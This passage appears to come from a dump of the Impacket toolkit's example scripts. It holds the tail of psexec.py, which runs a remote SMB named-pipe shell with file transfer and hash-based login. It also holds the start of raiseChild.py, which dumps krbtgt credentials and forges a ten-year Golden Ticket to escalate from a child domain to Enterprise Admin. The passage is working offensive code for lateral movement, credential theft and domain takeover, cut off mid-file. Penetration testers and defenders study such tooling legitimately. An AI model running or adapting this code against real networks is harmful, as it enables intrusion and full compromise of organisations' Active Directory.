b\"\\n\".join(lines[:-1]) + b\"\\n\"\n # Remainder data for next iteration\n __stderrOutputBuffer = lines[-1]\n\n if len(__stderrData) != 0:\n # There is data to print\n try:\n sys.stdout.write(__stderrData.decode(CODEC))\n sys.stdout.flush()\n __stderrData = b\"\"\n except UnicodeDecodeError:\n logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings\\nand then execute smbexec.py '\n 'again with -codec and the corresponding codec')\n print(__stderrData.decode(CODEC, errors='replace'))\n __stderrData = b\"\"\n else:\n # Don't echo the command that was sent, and clear it up\n LastDataSent = b\"\"\n # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,\n # it will give false positives tho.. we should find a better way to handle this.\n # if LastDataSent > 10:\n # LastDataSent = ''\n except Exception as e:\n pass\n else:\n __stderrOutputBuffer, __stderrData = '', ''\n\n while True:\n try:\n stderr_ans = self.server.readFile(self.tid, self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n if len(stderr_ans) != 0:\n # Append new data to the buffer while there is data to read\n __stderrOutputBuffer += stderr_ans\n\n if '\\n' in __stderrOutputBuffer:\n # We have read a line, print buffer if it is not empty\n lines = __stderrOutputBuffer.split(\"\\n\")\n # All lines, we shouldn't have encoding errors\n __stderrData = \"\\n\".join(lines[:-1]) + \"\\n\"\n # Remainder data for next iteration\n __stderrOutputBuffer = lines[-1]\n\n if len(__stderrData) != 0:\n # There is data to print\n sys.stdout.write(__stderrData.decode(CODEC))\n sys.stdout.flush()\n __stderrData = \"\"\n else:\n # Don't echo the command that was sent, and clear it up\n LastDataSent = \"\"\n # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,\n # it will give false positives tho.. we should find a better way to handle this.\n # if LastDataSent > 10:\n # LastDataSent = ''\n except:\n pass\n\n\nclass RemoteShell(cmd.Cmd):\n def __init__(self, server, port, credentials, tid, fid, share, transport):\n cmd.Cmd.__init__(self, False)\n self.prompt = '\\x08'\n self.server = server\n self.transferClient = None\n self.tid = tid\n self.fid = fid\n self.credentials = credentials\n self.share = share\n self.port = port\n self.transport = transport\n self.intro = '[!] Press help for extra shell commands'\n\n def connect_transferClient(self):\n #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)\n self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,\n preferredDialect=dialect)\n user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n if self.transport.get_kerberos() is True:\n self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey,\n kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)\n else:\n self.transferClient.login(user, passwd, domain, lm, nt)\n\n def do_help(self, line):\n print(\"\"\"\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n lput {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)\n lget {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir\n ! {cmd} - executes a local shell cmd\n\"\"\" % (self.share, self.share))\n self.send_data('\\r\\n', False)\n\n def do_shell(self, s):\n os.system(s)\n self.send_data('\\r\\n')\n\n def do_lget(self, src_path):\n try:\n if self.transferClient is None:\n self.connect_transferClient()\n\n import ntpath\n filename = ntpath.basename(src_path)\n fh = open(filename,'wb')\n logging.info(\"Downloading %s\\\\%s\" % (self.share, src_path))\n self.transferClient.getFile(self.share, src_path, fh.write)\n fh.close()\n except Exception as e:\n logging.critical(str(e))\n pass\n\n self.send_data('\\r\\n')\n\n def do_lput(self, s):\n try:\n if self.transferClient is None:\n self.connect_transferClient()\n params = s.split(' ')\n if len(params) > 1:\n src_path = params[0]\n dst_path = params[1]\n elif len(params) == 1:\n src_path = params[0]\n dst_path = '/'\n\n src_file = os.path.basename(src_path)\n fh = open(src_path, 'rb')\n f = dst_path + '/' + src_file\n pathname = f.replace('/','\\\\')\n logging.info(\"Uploading %s to %s\\\\%s\" % (src_file, self.share, dst_path))\n if PY3:\n self.transferClient.putFile(self.share, pathname, fh.read)\n else:\n self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)\n fh.close()\n except Exception as e:\n logging.error(str(e))\n pass\n\n self.send_data('\\r\\n')\n\n def do_lcd(self, s):\n if s == '':\n print(os.getcwd())\n else:\n os.chdir(s)\n self.send_data('\\r\\n')\n\n def emptyline(self):\n self.send_data('\\r\\n')\n return\n\n def default(self, line):\n if PY3:\n self.send_data(line.encode(CODEC)+b'\\r\\n')\n else:\n self.send_data(line.decode(sys.stdin.encoding).encode(CODEC)+'\\r\\n')\n\n def send_data(self, data, hideOutput = True):\n if hideOutput is True:\n global LastDataSent\n LastDataSent = data\n else:\n LastDataSent = ''\n self.server.writeFile(self.tid, self.fid, data)\n\nclass RemoteStdInPipe(Pipes):\n def __init__(self, transport, pipe, permisssions, share=None):\n self.shell = None\n Pipes.__init__(self, transport, pipe, permisssions, share)\n\n def run(self):\n self.connectPipe()\n self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)\n self.shell.cmdloop()\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"PSEXEC like functionality example using RemComSvc.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('command', nargs='*', default = ' ', help='command (or arguments if -c is used) to execute at '\n 'the target (w/o path) - (default:cmd.exe)')\n parser.add_argument('-c', action='store',metavar = \"pathname\", help='copy the filename for later execution, '\n 'arguments are passed in the command option')\n parser.add_argument('-path', action='store', help='path of the command to execute')\n parser.add_argument('-file', action='store', help=\"alternative RemCom binary (be sure it doesn't require CRT)\")\n parser.add_argument('-ts', action='store_true', help='adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n '\"%s\"). If errors are detected, run chcp.com at the target, '\n 'map the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py '\n 'again with -codec and the corresponding codec ' % CODEC)\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n group.add_argument('-service-name', action='store', metavar=\"service_name\", default = '', help='The name of the service'\n ' used to trigger the payload')\n group.add_argument('-remote-binary-name', action='store', metavar=\"remote_binary_name\", default = None, help='This will '\n 'be the name of the executable uploaded on the target')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.codec is not None:\n CODEC = options.codec\n else:\n if CODEC is None:\n CODEC = 'utf-8'\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab (options.keytab, username, domain, options)\n options.k = True\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n command = ' '.join(options.command)\n if command == ' ':\n command = 'cmd.exe'\n\n executer = PSEXEC(command, options.path, options.file, options.c, int(options.port), username, password, domain, options.hashes,\n options.aesKey, options.k, options.dc_ip, options.service_name, options.remote_binary_name)\n executer.run(remoteName, options.target_ip)\n" }, { "path": "examples/raiseChild.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script implements a child-domain to forest privilege escalation\n# as detailed by Sean Metcalf (@PyroTek3) at https://adsecurity.org/?p=1640. We will\n# be (ab)using the concept of Golden Tickets and ExtraSids researched and implemented\n# by Benjamin Delpy (@gentilkiwi) in mimikatz (https://github.com/gentilkiwi/mimikatz).\n# The idea of automating all these tasks came from @mubix.\n#\n# The workflow is as follows:\n# Input:\n# 1) child-domain Admin credentials (password, hashes or aesKey) in the form of 'domain/username[:password]'\n# The domain specified MUST be the domain FQDN.\n# 2) Optionally a pathname to save the generated golden ticket (-w switch)\n# 3) Optionally a target-user RID to get credentials (-targetRID switch)\n# Administrator by default.\n# 4) Optionally a target to PSEXEC with the target-user privileges to (-target-exec switch).\n# Enterprise Admin by default.\n#\n# Process:\n# 1) Find out where the child domain controller is located and get its info (via [MS-NRPC])\n# 2) Find out what the forest FQDN is (via [MS-NRPC])\n# 3) Get the forest's Enterprise Admin SID (via [MS-LSAT])\n# 4) Get the child domain's krbtgt credentials (via [MS-DRSR])\n# 5) Create a Golden Ticket specifying SID from 3) inside the KERB_VALIDATION_INFO's ExtraSids array\n# and setting expiration 10 years from now\n# 6) Use the generated ticket to log into the forest and get the target user info (krbtgt/admin by default)\n# 7) If file was specified, save the golden ticket in ccache format\n# 8) If target was specified, a PSEXEC shell is launched\n#\n# Output:\n# 1) Target user credentials (Forest's krbtgt/admin credentials by default)\n# 2) A golden ticket saved in ccache for future fun and profit\n# 3) PSExec Shell with the target-user privileges (Enterprise Admin privileges by default) at target-exec\n# parameter.\n#\n# IMPORTANT NOTE: Your machine MUST be able to resolve all the domains from the child domain up to the\n# forest. Easiest way to do is by adding the forest's DNS to your resolv.conf or similar\n#\n# E.G:\n# Just in case, Microsoft says it all (https://technet.microsoft.com/en-us/library/cc759073(v=ws.10).aspx):\n# A forest is the only component of the Active Directory logical structure that is a security boundary.\n# By contrast, a domain is not a security boundary because it is not possible for administrators from one domain\n# to prevent a malicious administrator from another domain within the forest from accessing data in their domain.\n# A domain is, however, the administrative boundary for managing objects, such as users, groups, and computers.\n# In addition, each domain has its own individual security policies and trust relationships with other domains.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport logging\nimport random\nimport string\nimport sys\nimport os\nimport cmd\nimport time\nfrom threading import Thread, Lock\nfrom binascii import unhexlify, hexlify\nfrom socket import gethostbyname\nfrom struct import unpack\nfrom six import PY3\n\ntry:\n import pyasn1\nexcept ImportError:\n logging.critical('This module needs pyasn1 installed')\n logging.critical('You can get it from https://pypi.python.org/pypi/pyasn1')\n sys.exit(1)\nfrom impacket import version\nfrom impacket.krb5.types import Principal, KerberosTime\nfrom impacket.krb5 import constants\nfrom impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, KerberosError\nfrom impacket.krb5.asn1 import AS_REP, AuthorizationData, AD_IF_RELEVANT, EncTicketPart\nfrom impacket.krb5.crypto import Key, _enctype_table, _checksum_table, Enctype\nfrom impacket.dcerpc.v5.ndr import NDRULONG\nfrom impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED\nfrom pyasn1.codec.der import decoder, encoder\nfrom pyasn1.type.univ import noValue\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity\nfrom impacket.ntlm import LMOWFv1, NTOWFv1\nfrom impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE\nfrom impacket.dcerpc.v5.nrpc import MSRPC_UUID_NRPC, hDsrGetDcNameEx\nfrom impacket.dcerpc.v5.lsat import MSRPC_UUID_LSAT, POLICY_LOOKUP_NAMES, LSAP_LOOKUP_LEVEL, hLsarLookupSids\nfrom impacket.dcerpc.v5.lsad import hLsarQueryInformationPolicy2, POLICY_INFORMATION_CLASS, hLsarOpenPolicy2\nfrom impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \\\n PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, \\\n PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, VALIDATION_INFO\nfrom impacket.dcerpc.v5 import transport, drsuapi, epm, samr\nfrom impacket.smbconnection import SessionError\nfrom impacket.nt_errors import STATUS_NO_LOGON_SERVERS\nfrom impacket.smbconnection import SMBConnection, smb\nfrom impacket.structure import Structure\nfrom impacket.examples import remcomsvc, serviceinstall\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\n\nclass RemComMessage(Structure):\n structure = (\n ('Command','4096s=\"\"'),\n ('WorkingDir','260s=\"\"'),\n ('Priority',' 0:\n try:\n s.waitNamedPipe(tid,pipe)\n pipeReady = True\n except:\n tries -= 1\n time.sleep(2)\n pass\n\n if tries == 0:\n raise Exception('Pipe not ready, aborting')\n\n fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)\n\n return fid\n\nclass Pipes(Thread):\n def __init__(self, transport, pipe, permissions, TGS=None, share=None):\n Thread.__init__(self)\n self.server = 0\n self.transport = transport\n self.credentials = transport.get_credentials()\n self.tid = 0\n self.fid = 0\n self.share = share\n self.port = transport.get_dport()\n self.pipe = pipe\n self.permissions = permissions\n self.TGS = TGS\n self.daemon = True\n\n def connectPipe(self):\n try:\n lock.acquire()\n global dialect\n self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(),\n sess_port=self.port, preferredDialect=dialect)\n user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n self.server.login(user, passwd, domain, lm, nt)\n lock.release()\n self.tid = self.server.connectTree('IPC$') \n\n self.server.waitNamedPipe(self.tid, self.pipe)\n self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)\n self.server.setTimeout(1000000)\n except Exception:\n logging.critical(\"Something wen't wrong connecting the pipes(%s), try again\" % self.__class__)\n\nclass RemoteStdOutPipe(Pipes):\n def __init__(self, transport, pipe, permisssions):\n Pipes.__init__(self, transport, pipe, permisssions)\n\n def run(self):\n self.connectPipe()\n while True:\n try:\n ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n global LastDataSent\n if ans != LastDataSent:\n sys.stdout.write(ans.decode('cp437'))\n sys.stdout.flush()\n else:\n # Don't echo what I sent, and clear it up\n LastDataSent = ''\n # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,\n # it will give false positives tho.. we should find a better way to handle this.\n if LastDataSent > 10:\n LastDataSent = ''\n except:\n pass\n\nclass RemoteStdErrPipe(Pipes):\n def __init__(self, transport, pipe, permisssions):\n Pipes.__init__(self, transport, pipe, permisssions)\n\n def run(self):\n self.connectPipe()\n while True:\n try:\n ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n sys.stderr.write(str(ans))\n sys.stderr.flush()\n except:\n pass\n\nclass RemoteShell(cmd.Cmd):\n def __init__(self, server, port, credentials, tid, fid, TGS, share):\n cmd.Cmd.__init__(self, False)\n self.prompt = '\\x08'\n self.server = server\n self.transferClient = None\n self.tid = tid\n self.fid = fid\n self.credentials = credentials\n self.share = share\n self.port = port\n self.TGS = TGS\n self.intro = '[!] Press help for extra shell commands'\n\n def connect_transferClient(self):\n self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,\n preferredDialect=dialect)\n user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGS=self.TGS, useCache=False)\n\n def do_help(self, line):\n print(\"\"\"\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)\n get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir \n ! {cmd} - executes a local shell cmd\n\"\"\" % (self.share, self.share))\n self.send_data('\\r\\n', False)\n\n def do_shell(self, s):\n os.system(s)\n self.send_data('\\r\\n')\n\n def do_get(self, src_path):\n try:\n if self.transferClient is None:\n self.connect_transferClient()\n\n import ntpath\n filename = ntpath.basename(src_path)\n fh = open(filename,'wb')\n logging.info(\"Downloading %s\\\\%s\" % (self.share, src_path))\n self.transferClient.getFile(self.share, src_path, fh.write)\n fh.close()\n except Exception as e:\n logging.error(str(e))\n pass\n\n self.send_data('\\r\\n')\n \n def do_put(self, s):\n try:\n if self.transferClient is None:\n self.connect_transferClient()\n params = s.split(' ')\n if len(params) > 1:\n src_path = params[0]\n dst_path = params[1]\n elif len(params) == 1:\n src_path = params[0]\n dst_path = '/'\n\n src_file = os.path.basename(src_path)\n fh = open(src_path, 'rb')\n f = dst_path + '/' + src_file\n pathname = f.replace('/','\\\\')\n logging.info(\"Uploading %s to %s\\\\%s\" % (src_file, self.share, dst_path))\n if PY3:\n self.transferClient.putFile(self.share, pathname, fh.read)\n else:\n self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)\n fh.close()\n except Exception as e:\n logging.error(str(e))\n pass\n\n self.send_data('\\r\\n')\n\n\n def do_lcd(self, s):\n if s == '':\n print(os.getcwd())\n else:\n try:\n os.chdir(s)\n except Exception as e:\n logging.error(str(e))\n self.send_data('\\r\\n')\n\n def emptyline(self):\n self.send_data('\\r\\n')\n return\n\n def default(self, line):\n if PY3:\n self.send_data(line.encode('cp437')+b'\\r\\n')\n else:\n self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\\r\\n')\n\n def send_data(self, data, hideOutput = True):\n if hideOutput is True:\n global LastDataSent\n LastDataSent = data\n else:\n LastDataSent = ''\n self.server.writeFile(self.tid, self.fid, data)\n\nclass RemoteStdInPipe(Pipes):\n def __init__(self, transport, pipe, permisssions, TGS=None, share=None):\n Pipes.__init__(self, transport, pipe, permisssions, TGS, share)\n\n def run(self):\n self.connectPipe()\n shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.TGS, self.share)\n shell.cmdloop()\n\nclass RAISECHILD:\n def __init__(self, target = None, username = '', password = '', domain='', options = None, command=''):\n self.__rid = 0\n self.__targetRID = options.targetRID\n self.__target = target\n self.__kdcHost = None\n self.__command = command\n self.__writeTGT = options.w\n self.__domainSid = ''\n self.__doKerberos = options.k\n self.__drsr = None\n self.__ppartialAttrSet = None\n self.__creds = {}\n\n self.__creds['username'] = username\n self.__creds['password'] = password\n self.__creds['domain'] = domain\n self.__creds['lmhash'] = ''\n self.__creds['nthash'] = ''\n self.__creds['aesKey'] = options.aesKey\n self.__creds['TGT'] = None\n self.__creds['TGS'] = None\n\n #if options.dc_ip is not None:\n # self.__kdcHost = options.dc_ip\n #else:\n # self.__kdcHost = domain\n self.__kdcHost = None\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n self.__creds['lmhash'] = unhexlify(lmhash)\n self.__creds['nthash'] = unhexlify(nthash)\n\n # Transform IP addresses into FQDNs\n if self.__target is not None:\n self.__target = self.getDNSMachineName(self.__target)\n logging.debug('getDNSMachineName for %s returned %s' % (target, self.__target))\n\n NAME_TO_ATTRTYP = {\n 'objectSid': 0x90092,\n 'userPrincipalName': 0x90290,\n 'sAMAccountName': 0x900DD,\n 'unicodePwd': 0x9005A,\n 'dBCSPwd': 0x90037,\n 'supplementalCredentials': 0x9007D,\n }\n\n ATTRTYP_TO_ATTID = {\n 'objectSid': '1.2.840.113556.1.4.146',\n 'userPrincipalName': '1.2.840.113556.1.4.656',\n 'sAMAccountName': '1.2.840.113556.1.4.221',\n 'unicodePwd': '1.2.840.113556.1.4.90',\n 'dBCSPwd': '1.2.840.113556.1.4.55',\n 'supplementalCredentials': '1.2.840.113556.1.4.125',\n }\n\n KERBEROS_TYPE = {\n 1:'dec-cbc-crc',\n 3:'des-cbc-md5',\n 17:'aes128-cts-hmac-sha1-96',\n 18:'aes256-cts-hmac-sha1-96',\n 0xffffff74:'rc4_hmac',\n }\n\n HMAC_SHA1_96_AES256 = 0x10\n\n def getChildInfo(self, creds):\n logging.debug('Calling NRPC DsrGetDcNameEx()')\n target = creds['domain']\n if self.__doKerberos is True:\n # In Kerberos we need the target's name\n machineNameOrIp = self.getDNSMachineName(gethostbyname(target))\n logging.debug('%s is %s' % (gethostbyname(target), machineNameOrIp))\n else:\n machineNameOrIp = target\n\n stringBinding = r'ncacn_np:%s[\\pipe\\netlogon]' % machineNameOrIp\n\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n if hasattr(rpctransport, 'set_credentials'):\n rpctransport.set_credentials(creds['username'], creds['password'], creds['domain'], creds['lmhash'],\n creds['nthash'], creds['aesKey'])\n if self.__doKerberos or creds['aesKey'] is not None:\n rpctransport.set_kerberos(True)\n\n dce = rpctransport.get_dce_rpc()\n dce.connect()\n dce.bind(MSRPC_UUID_NRPC)\n\n resp = hDsrGetDcNameEx(dce, NULL, NULL, NULL, NULL, 0)\n #resp.dump()\n return resp['DomainControllerInfo']['DomainName'][:-1], resp['DomainControllerInfo']['DnsForestName'][:-1]\n\n @staticmethod\n def getMachineName(machineIP):\n try:\n s = SMBConnection(machineIP, machineIP)\n s.login('', '')\n except OSError as e:\n if str(e).find('timed out') > 0:\n raise Exception('The connection is timed out. Probably 445/TCP port is closed. Try to specify '\n 'corresponding NetBIOS name or FQDN instead of IP address')\n else:\n raise\n except SessionError as e:\n if str(e).find('STATUS_NOT_SUPPORTED') > 0:\n raise Exception('The SMB request is not supported. Probably NTLM is disabled. Try to specify '\n 'corresponding NetBIOS name or FQDN as the value of the -dc-host option.')\n else:\n raise\n except Exception:\n logging.debug('Error while anonymous logging into %s' % machineIP)\n else:\n s.logoff()\n return s.getServerName()\n\n @staticmethod\n def getDNSMachineName(machineIP):\n try:\n s = SMBConnection(machineIP, machineIP)\n s.login('', '')\n except OSError as e:\n if str(e).find('timed out') > 0:\n raise Exception('The connection is timed out. Probably 445/TCP port is closed. Try to specify '\n 'corresponding NetBIOS name or FQDN instead of IP address.')\n else:\n raise\n except SessionError as e:\n if str(e).find('STATUS_NOT_SUPPORTED') > 0:\n raise Exception('The SMB request is not supported. Probably NTLM is disabled. Try to specify '\n 'corresponding NetBIOS name or FQDN as the value of the -dc-host option.')\n else:\n raise\n except Exception:\n logging.debug('Error while anonymous logging into %s' % machineIP)\n else:\n s.logoff()\n return s.getServerName() + '.' + s.getServerDNSDomainName()\n\n def getParentSidAndTargetName(self, parentDC, creds, targetRID):\n if self.__doKerberos is True:\n # In Kerberos we need the target's name\n machineNameOrIp = self.getDNSMachineName(gethostbyname(parentDC))\n logging.debug('%s is %s' % (gethostbyname(parentDC), machineNameOrIp))\n else:\n machineNameOrIp = gethostbyname(parentDC)\n\n logging.debug('Calling LSAT hLsarQueryInformationPolicy2()')\n stringBinding = r'ncacn_np:%s[\\pipe\\lsarpc]' % machineNameOrIp\n\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n if hasattr(rpctransport, 'set_credentials'):\n rpctransport.set_credentials(creds['username'], creds['password'], creds['domain'], creds['lmhash'],\n creds['nthash'], creds['aesKey'])\n rpctransport.set_kerberos(self.__doKerberos)\n\n dce = rpctransport.get_dce_rpc()\n dce.connect()\n dce.bind(MSRPC_UUID_LSAT)\n\n resp = hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | POLICY_LOOKUP_NAMES)\n policyHandle = resp['PolicyHandle']\n\n resp = hLsarQueryInformationPolicy2(dce, policyHandle, POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)\n\n domainSid = resp['PolicyInformation']['PolicyAccountDomainInfo']['DomainSid'].formatCanonical()\n\n # Now that we have the Sid, let's get the Administrator's account name\n sids = list()\n sids.append(domainSid+'-'+targetRID)\n resp = hLsarLookupSids(dce, policyHandle, sids, LSAP_LOOKUP_LEVEL.LsapLookupWksta)\n targetName = resp['TranslatedNames']['Names'][0]['Name']\n\n return domainSid, targetName\n\n def __connectDrds(self, domainName, creds):\n if self.__doKerberos is True or creds['TGT'] is not None:\n # In Kerberos we need the target's name\n machineNameOrIp = self.getDNSMachineName(gethostbyname(domainName))\n logging.debug('%s is %s' % (gethostbyname(domainName), machineNameOrIp))\n else:\n machineNameOrIp = gethostbyname(domainName)\n stringBinding = epm.hept_map(machineNameOrIp, drsuapi.MSRPC_UUID_DRSUAPI,\n protocol='ncacn_ip_tcp')\n rpc = transport.DCERPCTransportFactory(stringBinding)\n if hasattr(rpc, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n if creds['TGT'] is not None:\n rpc.set_credentials(creds['username'],'', creds['domain'], TGT=creds['TGT'])\n rpc.set_kerberos(True)\n else:\n rpc.set_credentials(creds['username'], creds['password'], creds['domain'], creds['lmhash'],\n creds['nthash'], creds['aesKey'])\n rpc.set_kerberos(self.__doKerberos)\n self.__drsr = rpc.get_dce_rpc()\n self.__drsr.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n if self.__doKerberos or creds['TGT'] is not None:\n self.__drsr.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n self.__drsr.connect()\n self.__drsr.bind(drsuapi.MSRPC_UUID_DRSUAPI)\n\n request = drsuapi.DRSBind()\n request['puuidClientDsa'] = drsuapi.NTDSAPI_CLIENT_GUID\n drs = drsuapi.DRS_EXTENSIONS_INT()\n drs['cb'] = len(drs) #- 4\n drs['dwFlags'] = drsuapi.DRS_EXT_GETCHGREQ_V6 | drsuapi.DRS_EXT_GETCHGREPLY_V6 | drsuapi.DRS_EXT_GETCHGREQ_V8 |\\\n drsuapi.DRS_EXT_STRONG_ENCRYPTION\n drs['SiteObjGuid'] = drsuapi.NULLGUID\n drs['Pid'] = 0\n drs['dwReplEpoch'] = 0\n drs['dwFlagsExt'] = 0\n drs['ConfigObjGUID'] = drsuapi.NULLGUID\n drs['dwExtCaps'] = 127\n request['pextClient']['cb'] = len(drs.getData())\n request['pextClient']['rgb'] = list(drs.getData())\n resp = self.__drsr.request(request)\n\n # Let's dig into the answer to check the dwReplEpoch. This field should match the one we send as part of\n # DRSBind's DRS_EXTENSIONS_INT(). If not, it will fail later when trying to sync data.\n drsExtensionsInt = drsuapi.DRS_EXTENSIONS_INT()\n\n # If dwExtCaps is not included in the answer, let's just add it so we can unpack DRS_EXTENSIONS_INT right.\n ppextServer = b''.join(resp['ppextServer']['rgb']) + b'\\x00' * (\n len(drsuapi.DRS_EXTENSIONS_INT()) - resp['ppextServer']['cb'])\n drsExtensionsInt.fromString(ppextServer)\n\n if drsExtensionsInt['dwReplEpoch'] != 0:\n # Different epoch, we have to call DRSBind again\n if logging.getLogger().level == logging.DEBUG:\n logging.debug(\"DC's dwReplEpoch != 0, setting it to %d and calling DRSBind again\" % drsExtensionsInt[\n 'dwReplEpoch'])\n drs['dwReplEpoch'] = drsExtensionsInt['dwReplEpoch']\n request['pextClient']['cb'] = len(drs)\n request['pextClient']['rgb'] = list(drs.getData())\n resp = self.__drsr.request(request)\n\n self.__hDrs = resp['phDrs']\n\n # Now let's get the NtdsDsaObjectGuid UUID to use when querying NCChanges\n resp = drsuapi.hDRSDomainControllerInfo(self.__drsr, self.__hDrs, domainName, 2)\n\n if resp['pmsgOut']['V2']['cItems'] > 0:\n self.__NtdsDsaObjectGuid = resp['pmsgOut']['V2']['rItems'][0]['NtdsDsaObjectGuid']\n else:\n logging.error(\"Couldn't get DC info for domain %s\" % domainName)\n raise Exception('Fatal, aborting')\n\n def DRSCrackNames(self, target, formatOffered=drsuapi.DS_NAME_FORMAT.DS_DISPLAY_NAME,\n formatDesired=drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name='', creds=None):\n if self.__drsr is None:\n self.__connectDrds(target, creds)\n\n resp = drsuapi.hDRSCrackNames(self.__drsr, self.__hDrs, 0, formatOffered, formatDesired, (name,))\n return resp\n\n def __decryptSupplementalInfo(self, record, prefixTable=None):\n # This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures\n plainText = None\n for attr in record['pmsgOut']['V6']['pObjects']['Entinf']['AttrBlock']['pAttr']:\n try:\n attId = drsuapi.OidFromAttid(prefixTable, attr['attrTyp'])\n LOOKUP_TABLE = self.ATTRTYP_TO_ATTID\n except Exception as e:\n logging.debug('Failed to execute OidFromAttid with error %s' % e)\n # Fallbacking to fixed table and hope for the best\n attId = attr['attrTyp']\n LOOKUP_TABLE = self.NAME_TO_ATTRTYP\n\n if attId == LOOKUP_TABLE['supplementalCredentials']:\n if attr['AttrVal']['valCount'] > 0:\n blob = 